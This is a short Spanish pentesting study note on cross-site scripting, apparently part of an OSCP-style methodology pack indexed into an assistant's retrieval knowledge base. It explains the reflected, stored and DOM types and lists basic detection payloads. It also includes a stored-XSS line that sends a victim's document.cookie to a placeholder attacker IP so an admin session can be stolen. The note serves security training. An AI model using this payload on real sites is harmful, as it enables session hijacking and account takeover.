JARVIS/nucleo/saber/conocimiento/02 - Explotacion web/XSS.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.1 KiB

XSS (Cross-Site Scripting)

Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.

Tipos

Reflected → tu payload vuelve en la respuesta de ESA petición (?q=<script>...)
Stored    → se guarda (comentario, perfil) y se dispara a quien lo vea (más potente)
DOM       → el JS del cliente mete tu input en el DOM sin sanear

Detección y payloads

<script>alert(1)</script>
<img src=x onerror=alert(document.domain)>
"><svg onload=alert(1)>

Prueba primero un marcador inofensivo y mira si se renderiza o se escapa (en Burp Repeater e Intruder).

Para qué sirve en OSCP

  • Robar la cookie de sesión de un admin (XSS stored en un panel que el admin revisa):
<script>new Image().src='http://TU_IP/c='+document.cookie</script>

La recibes en tu python3 -m http.server → la usas en Authentication attacks.

  • A veces el panel admin tiene una función que escala a RCE / File upload bypass.

Relacionado: SSTI · Authentication attacks · OSCP MOC